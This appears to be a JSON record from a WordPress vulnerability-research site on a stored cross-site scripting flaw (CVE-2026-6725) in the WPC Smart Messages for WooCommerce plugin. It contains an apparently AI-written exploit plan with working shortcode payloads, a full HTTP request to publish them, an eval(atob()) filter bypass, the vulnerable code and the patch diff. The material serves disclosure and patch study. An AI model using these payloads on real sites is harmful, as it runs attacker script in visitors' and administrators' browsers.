[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f6FkBccFEqN9ZfD9RAj3VfRdfyY01xhSB8vj4-HeYRwE":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":26,"research_verified":27,"research_rounds_completed":28,"research_plan":29,"research_summary":30,"research_vulnerable_code":31,"research_fix_diff":32,"research_exploit_outline":33,"research_model_used":34,"research_started_at":35,"research_completed_at":36,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":27,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":27,"source_links":37},"CVE-2026-6725","wpc-smart-messages-for-woocommerce-authenticated-contributor-stored-cross-site-scripting-via-shortcode-attribute","WPC Smart Messages for WooCommerce \u003C= 4.2.8 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attribute","The WPC Smart Messages for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'text' attribute of the `wpcsm_text_rotator` shortcode in all versions up to, and including, 4.2.8. This is due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","wpc-smart-messages",null,"\u003C=4.2.8","4.2.9","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-27 15:55:16","2026-04-28 04:28:22",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F9c1ac689-329a-4459-8b67-176e959cc02d?source=api-prod",1,[22,23,24,25],"includes\u002Fclass-shortcode.php","languages\u002Fwpc-smart-messages.pot","readme.txt","wpc-smart-messages.php","researched",false,3,"# Vulnerability Research Plan: CVE-2026-6725 (WPC Smart Messages Stored XSS)\n\n## 1. Vulnerability Summary\nThe **WPC Smart Messages for WooCommerce** plugin (\u003C= 4.2.8) is vulnerable to **Stored Cross-Site Scripting (XSS)** via the `text` attribute of the `[wpcsm_text_rotator]` shortcode. The plugin fails to sanitize or escape the user-supplied content of this attribute before rendering it on the page. This allows an authenticated attacker with **Contributor-level** permissions or higher to embed malicious scripts into posts or pages, which will execute in the context of any user viewing the content.\n\n## 2. Attack Vector Analysis\n- **Endpoint**: WordPress Post\u002FPage Editor (standard `wp-admin\u002Fpost.php` or `wp-admin\u002Fpost-new.php`).\n- **Shortcode**: `[wpcsm_text_rotator]`\n- **Vulnerable Parameter**: The `text` attribute within the shortcode.\n- **Authentication**: Required (Contributor role or higher).\n- **Preconditions**: WooCommerce must be installed and active (plugin dependency).\n\n## 3. Code Flow\n1. **Registration**: In `includes\u002Fclass-shortcode.php`, the `init()` method registers the shortcode:\n   ```php\n   add_shortcode( 'wpcsm_text_rotator', [ $this, 'text_rotator' ] );\n   ```\n2. **Processing**: When a page containing the shortcode is rendered, WordPress calls the `text_rotator($attrs)` method in `Wpcsm_Shortcode` (found in `includes\u002Fclass-shortcode.php`).\n3. **Handling Attributes**: The function extracts attributes, including `text`.\n4. **Splitting Logic (Inferred)**: Based on the plugin's description in `self::$shortcodes`, the `text` attribute is split by commas:\n   `\"text split by a comma\"`\n5. **The Sink (Inferred)**: The code likely loops through the split strings and returns them wrapped in HTML tags without calling `esc_html()` or `esc_attr()`. \n   ```php\n   \u002F\u002F Likely vulnerable logic:\n   $texts = explode(',', $atts['text']);\n   foreach($texts as $t) {\n       $output .= '\u003Cdiv class=\"wpcsm-text-item\">' . $t . '\u003C\u002Fdiv>'; \u002F\u002F SINK: Unescaped variable $t\n   }\n   ```\n\n## 4. Nonce Acquisition Strategy\nThis vulnerability is exploited by saving a standard WordPress post\u002Fpage. There is no specific plugin-level nonce for the shortcode rendering itself, but a standard WordPress `_wpnonce` is required to save a post.\n\n**Strategy for the Automated Agent:**\n1. Log in to the WordPress dashboard as a **Contributor**.\n2. Navigate to `wp-admin\u002Fpost-new.php`.\n3. Extract the `_wpnonce` and `post_ID` from the HTML form.\n   - Nonce Location: `input[name=\"_wpnonce\"]`\n   - Post ID Location: `input[name=\"post_ID\"]`\n4. Use these to send the `editpost` request via `http_request`.\n\n## 5. Exploitation Strategy\nThe exploit involves creating a post with a malicious shortcode attribute.\n\n### Step-by-Step Plan:\n1. **Login**: Authenticate as a Contributor.\n2. **Identify Target**: Access `wp-admin\u002Fpost-new.php` to obtain a `post_ID` (WordPress creates an auto-draft).\n3. **Craft Payload**:\n   - The payload must avoid commas (as the plugin splits by comma).\n   - Payload: `\u003Cimg src=x onerror=alert(document.domain)>`\n   - Full Shortcode: `[wpcsm_text_rotator text=\"\u003Cimg src=x onerror=alert(document.domain)>\"]`\n4. **Submit Injection**: Send an HTTP POST request to `wp-admin\u002Fpost.php`.\n\n### HTTP Request Details (Example):\n```http\nPOST \u002Fwp-admin\u002Fpost.php HTTP\u002F1.1\nContent-Type: application\u002Fx-www-form-urlencoded\n\naction=editpost&\n_wpnonce=[EXTRACTED_NONCE]&\npost_ID=[POST_ID]&\npost_title=Test+XSS&\npost_type=post&\ncontent=%5Bwpcsm_text_rotator+text%3D%22%3Cimg+src%3Dx+onerror%3Dalert(document.domain)%3E%22%5D&\npublish=Publish\n```\n\n## 6. Test Data Setup\n1. **Install WooCommerce**: Ensure WooCommerce is installed and active.\n2. **Create User**:\n   ```bash\n   wp user create attacker attacker@example.com --role=contributor --user_pass=password\n   ```\n3. **Verify Plugin Version**: Ensure `wpc-smart-messages` version is `\u003C= 4.2.8`.\n\n## 7. Expected Results\n- When the post is saved, the database will store the shortcode literally.\n- When an administrator or any visitor navigates to the published post's URL, the browser will receive the raw `\u003Cimg src=x onerror=alert(document.domain)>` tag inside the text rotator container.\n- An alert box displaying the document domain will appear.\n\n## 8. Verification Steps\n1. **Database Check**: Verify the shortcode is stored.\n   ```bash\n   wp post get [POST_ID] --field=post_content\n   ```\n2. **Response Body Check**: Fetch the frontend URL of the post and search for the unescaped payload.\n   ```bash\n   # Use the agent to fetch the page and check for:\n   # \u003Cimg src=x onerror=alert(document.domain)>\n   ```\n\n## 9. Alternative Approaches\n- **Attribute Breakout**: If the `animation` attribute is also unescaped, try breaking out of the `data-animation` attribute:\n  `[wpcsm_text_rotator animation='\">\u003Cscript>alert(1)\u003C\u002Fscript>' text='test']`\n- **Smart Messages CPT**: Check if the plugin allows Contributors to create \"Smart Messages\" via the `wpcsm_message` custom post type. If so, inject the shortcode directly into the `Message` field (`includes\u002Fclass-backend.php:878`).\n- **Complex Payloads**: If complex JS is needed (which requires commas), use `eval(atob('...'))` to bypass the `explode(',', ...)` logic.","The WPC Smart Messages for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting (XSS) via the 'text' attribute of the wpcsm_text_rotator and wpcsm_live_number shortcodes. In versions up to 4.2.8, the plugin fails to sanitize or escape user-supplied attributes before rendering them, allowing authenticated attackers with contributor-level permissions to inject malicious scripts that execute in the context of any user viewing the page.","\u002F\u002F includes\u002Fclass-shortcode.php (around line 456)\n$output .= '\u003Cspan class=\"wpcsm-text-rotator\" data-animation=\"' . esc_attr( $attrs['animation'] ) . '\" data-speed=\"' . esc_attr( $attrs['speed'] ) . '\">' . $attrs['text'] . '\u003C\u002Fspan>';\n\n---\n\n\u002F\u002F includes\u002Fclass-shortcode.php (around line 487)\n$output .= sprintf( $attrs['text'], '\u003Cspan class=\"wpcsm-number-rotator-value wpcsm-text-rotator\" data-animation=\"' . esc_attr( $attrs['animation'] ) . '\" data-speed=\"' . esc_attr( $attrs['duration'] ) . '\">' . implode( ', ', $rand_values ) . '\u003C\u002Fspan>' );\n\n---\n\n\u002F\u002F includes\u002Fclass-shortcode.php (around line 491)\n$output .= sprintf( $attrs['text'], '\u003Cspan class=\"wpcsm-live-number-value\">' . $rand . '\u003C\u002Fspan>' );","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwpc-smart-messages\u002F4.2.8\u002Fincludes\u002Fclass-shortcode.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwpc-smart-messages\u002F4.2.9\u002Fincludes\u002Fclass-shortcode.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwpc-smart-messages\u002F4.2.8\u002Fincludes\u002Fclass-shortcode.php\t2026-03-28 06:48:48.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwpc-smart-messages\u002F4.2.9\u002Fincludes\u002Fclass-shortcode.php\t2026-04-21 02:58:20.000000000 +0000\n@@ -456,7 +456,7 @@\n \t\t\t\t'animation' => 'dissolve' \u002F\u002Fdissolve (default), fade, flip, flipUp, flipCube, flipCubeUp and spin\n \t\t\t], $attrs );\n \n-\t\t\t$output .= '\u003Cspan class=\"wpcsm-text-rotator\" data-animation=\"' . esc_attr( $attrs['animation'] ) . '\" data-speed=\"' . esc_attr( $attrs['speed'] ) . '\">' . $attrs['text'] . '\u003C\u002Fspan>';\n+\t\t\t$output .= '\u003Cspan class=\"wpcsm-text-rotator\" data-animation=\"' . esc_attr( $attrs['animation'] ) . '\" data-speed=\"' . esc_attr( $attrs['speed'] ) . '\">' . esc_html( $attrs['text'] ) . '\u003C\u002Fspan>';\n \n \t\t\treturn apply_filters( 'wpcsm_shortcode_live_number', $output, $attrs );\n \t\t}\n@@ -484,11 +484,11 @@\n \t\t\t\t}\n \n \t\t\t\t$output .= '\u003Cspan class=\"wpcsm-number-rotator\">';\n-\t\t\t\t$output .= sprintf( $attrs['text'], '\u003Cspan class=\"wpcsm-number-rotator-value wpcsm-text-rotator\" data-animation=\"' . esc_attr( $attrs['animation'] ) . '\" data-speed=\"' . esc_attr( $attrs['duration'] ) . '\">' . implode( ', ', $rand_values ) . '\u003C\u002Fspan>' );\n+\t\t\t\t$output .= sprintf( esc_html( $attrs['text'] ), '\u003Cspan class=\"wpcsm-number-rotator-value wpcsm-text-rotator\" data-animation=\"' . esc_attr( $attrs['animation'] ) . '\" data-speed=\"' . esc_attr( $attrs['duration'] ) . '\">' . implode( ', ', $rand_values ) . '\u003C\u002Fspan>' );\n \t\t\t\t$output .= '\u003C\u002Fspan>';\n \t\t\t} else {\n \t\t\t\t$output .= '\u003Cspan class=\"wpcsm-live-number\" data-val=\"' . esc_attr( $rand ) . '\" data-min=\"' . esc_attr( $attrs['min'] ) . '\" data-max=\"' . esc_attr( $attrs['max'] ) . '\" data-step=\"' . esc_attr( $attrs['step'] ) . '\" data-duration=\"' . esc_attr( $attrs['duration'] ) . '\" data-text=\"' . esc_attr( $attrs['text'] ) . '\">';\n-\t\t\t\t$output .= sprintf( $attrs['text'], '\u003Cspan class=\"wpcsm-live-number-value\">' . $rand . '\u003C\u002Fspan>' );\n+\t\t\t\t$output .= sprintf( esc_html( $attrs['text'] ), '\u003Cspan class=\"wpcsm-live-number-value\">' . $rand . '\u003C\u002Fspan>' );\n \t\t\t\t$output .= '\u003C\u002Fspan>';\n \t\t\t}","The exploit is executed by an authenticated user with Contributor-level access or higher. 1. The attacker logs into the WordPress dashboard and begins creating or editing a post or page. 2. In the post content, the attacker inserts the shortcode `[wpcsm_text_rotator text=\"\u003Cimg src=x onerror=alert(document.domain)>\"]`. Alternatively, the `[wpcsm_live_number]` shortcode can be used similarly with malicious content in its `text` attribute. 3. Upon saving and publishing the post, WordPress stores the shortcode literal. 4. When any user (including an administrator) visits the page on the frontend, the plugin processes the shortcode and outputs the raw HTML from the `text` attribute into the page source without escaping. This triggers the execution of the arbitrary JavaScript payload.","gemini-3-flash-preview","2026-05-04 18:18:02","2026-05-04 18:18:40",{"type":38,"vulnerable_version":39,"fixed_version":11,"vulnerable_browse":40,"vulnerable_zip":41,"fixed_browse":42,"fixed_zip":43,"all_tags":44},"plugin","4.2.8","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwpc-smart-messages\u002Ftags\u002F4.2.8","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwpc-smart-messages.4.2.8.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwpc-smart-messages\u002Ftags\u002F4.2.9","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwpc-smart-messages.4.2.9.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwpc-smart-messages\u002Ftags"]